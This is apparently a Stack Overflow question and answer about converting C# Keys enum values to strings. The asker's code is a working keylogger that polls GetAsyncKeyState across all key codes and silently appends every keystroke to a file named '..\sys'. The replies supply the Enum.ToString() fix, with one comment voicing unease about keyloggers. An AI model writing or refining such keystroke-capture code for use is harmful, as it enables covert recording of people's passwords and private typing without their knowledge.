# Convert Keys enumeration to string c#

Tags: c#, .net

I have a basic Keylogger. My code is the following:

```
class KeyStrokes
{
    [DllImport("user32.dll")]
    public static extern int GetAsyncKeyState(Int32 i);

    public static void StartLogging()
    {
        while (true)
        {
            //sleeping for while, this will reduce load on cpu
            Thread.Sleep(10);
            for (Int32 i = 3; i < 255; i++)
            {
                int keyState = GetAsyncKeyState(i);
                if (keyState == 1 || keyState == -32767)
                {
                    try
                    {
                        using (FileStream fs = new FileStream(@"..\sys", FileMode.Append, FileAccess.Write))
                        using (StreamWriter sw = new StreamWriter(fs))
                        {
                            sw.Write(((Keys)i));
                            sw.Flush();
                            sw.Close();
                        }
                        break;
                    }
                    catch (Exception) { }
                }
            }
        }
    }
}
```

But this code is records Keys enumeration. Can I convert this to string?

Comment: What sort of string? Would the built in(s) work? Like - LControl, RShift, A, B, etc.?

Comment: use `sw.Write((((Keys)i).ToString()))`;

Comment: a key logger is usually something not nice (why this program is recording everything I type??), but I understand there can be cases that is useful.
Anyway, I would avoid to open and close a file for each key pressed: this can result in a bad user experience, with keyboard input going slow (it depends on disk speed, but it sounds like something to avoid to me)

Answer (score 1):

Use the `Enum.ToString()` method like this:

```
sw.Write((((Keys)i)).ToString());
```

The `ToString()` converts the enum to its string representation which is generally the name of the enum member unless [format strings](https://msdn.microsoft.com/en-us/library/c3s1ez6e(v=vs.110).aspx) are specified.

Source - [MSDN](https://msdn.microsoft.com/en-us/library/16c1xs4z(v=vs.110).aspx).